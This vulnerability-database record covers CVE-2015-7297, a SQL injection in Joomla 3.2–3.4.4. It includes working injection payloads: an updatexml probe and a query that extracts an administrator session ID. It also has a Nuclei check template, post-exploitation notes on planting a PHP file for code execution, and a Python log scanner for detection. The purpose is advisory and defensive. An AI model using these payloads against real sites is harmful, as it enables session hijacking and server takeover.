cbcvebase.
CVE-2015-7297
published 2015-10-29


Priority: P2 74 high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit known
EPSS: 99.97% (100.0th percentile)
SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7858.

Affected

15 ranges

Vendor    Product    Version range    Fixed in
joomla    joomla_!   (15 ranges; the per-range version bounds and fixed-in versions are not listed in this record)

Detection & IOCs (extracted from sources)

url: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)
command: GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=
nuclei template (the record labels this block "yara", but the id/http/matchers layout is a Nuclei YAML template; the info and variables blocks below are added so the template is valid and {{num}} is defined):
id: CVE-2015-7297
info:
  name: Joomla! 3.2 - 3.4.4 com_contenthistory SQL injection   # name added here, not part of the extracted record
  severity: high
variables:
  num: "999999999"   # added: value for the {{num}} placeholder; the matcher checks for md5 of this value in the body
http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'
  • Exploit targets the com_contenthistory component via the list[select] GET parameter with error-based or UNION-based SQL injection payloads. Look for HTTP GET requests to /index.php with option=com_contenthistory and a non-empty list[select] parameter.
  • Post-exploitation involves creation of a random-named PHP file in a Joomla template directory via com_templates, then requesting it for RCE. Monitor for POST requests to /administrator/index.php?option=com_templates&task=template.createFile.
  • The exploit checks for a 500 error response containing a backtick-wrapped table name matching the pattern `(.*)_ucm_history` to confirm vulnerability and extract the table prefix.
  • Session hijacking is confirmed when the 500 error response body contains 'Duplicate entry' followed by a hex session ID. Monitor for this pattern in Joomla error responses.
  • The SQL injection payload uses an error-based technique with updatexml() or floor(rand(0)*2) GROUP BY; the exact payload varies depending on the database configuration and table prefix, which is dynamically retrieved during exploitation.
  • Affected versions are Joomla 3.2 through 3.4.4 only; version 3.4.5 contains the security fix.
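The detection notes above describe two request patterns worth alerting on in web server logs: a GET to /index.php with option=com_contenthistory and a non-empty list[select] parameter, and a POST to /administrator/index.php with option=com_templates and task=template.createFile. The following Python is an added example, not code from this record or from the Joomla project; it parses combined-format access-log lines (the sample lines are constructed, using documentation IP addresses) and returns alerts per line. It does not check the 'Duplicate entry' / `(.*)_ucm_history` error-body patterns, since those need response bodies rather than access logs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined/common access-log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not real traffic). Line 1 is the SQLi pattern, line 3 the
# com_templates file-creation pattern, lines 2 and 4 are benign Joomla requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Oct/2015:10:15:01 +0000] "GET /index.php?option=com_contenthistory'
    '&view=history&list%5Bordering%5D=&item_id=1&type_id=1'
    '&list%5Bselect%5D=updatexml(0x23,concat(1,md5(123)),1) HTTP/1.1" 500 2314',
    '198.51.100.7 - - [29/Oct/2015:10:15:07 +0000] "GET /index.php?option=com_contenthistory'
    '&view=history&list%5Bordering%5D=&item_id=1&type_id=1&list%5Bselect%5D= HTTP/1.1" 200 5120',
    '203.0.113.5 - - [29/Oct/2015:10:16:30 +0000] "POST /administrator/index.php'
    '?option=com_templates&task=template.createFile HTTP/1.1" 303 0',
    '192.0.2.9 - - [29/Oct/2015:10:17:00 +0000] "GET /index.php?option=com_content'
    '&view=article&id=1 HTTP/1.1" 200 8192',
]


def classify(line):
    """Return a list of alert strings for one access-log line (empty if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    method, target, status = m.group("method"), m.group("target"), int(m.group("status"))
    parts = urlsplit(target)
    # parse_qs percent-decodes keys, so list%5Bselect%5D becomes list[select];
    # keep_blank_values lets us distinguish "present but empty" from "non-empty".
    qs = parse_qs(parts.query, keep_blank_values=True)
    option = qs.get("option", [""])[0]
    alerts = []

    # Pattern 1: com_contenthistory with a non-empty list[select] (the injected SQL lands here).
    if method == "GET" and parts.path.endswith("/index.php") and option == "com_contenthistory":
        sel = qs.get("list[select]", [""])[0].strip()
        if sel:
            alerts.append(f"CVE-2015-7297 SQLi attempt: list[select]={sel[:40]!r} status={status}")

    # Pattern 2: post-exploitation file creation through the template manager.
    if (method == "POST" and parts.path.endswith("/administrator/index.php")
            and option == "com_templates"
            and qs.get("task", [""])[0] == "template.createFile"):
        alerts.append("post-exploitation: template file creation via com_templates")
    return alerts


def scan(lines):
    """Map 1-based line numbers that raised alerts to their alert lists."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = classify(line)
        if found:
            hits[n] = found
    return hits


if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        for alert in found:
            print(f"line {n}: {alert}")
```

An empty list[select] (line 2) is what the unexploited component sends, so the rule requires a non-empty value; correlating a pattern-1 hit with a 500 status, and a later pattern-2 POST from the same client, is the sequence the notes above describe.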

CVSS provenance

nvd: v2.0 7.5 HIGH AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck: 7.5 HIGH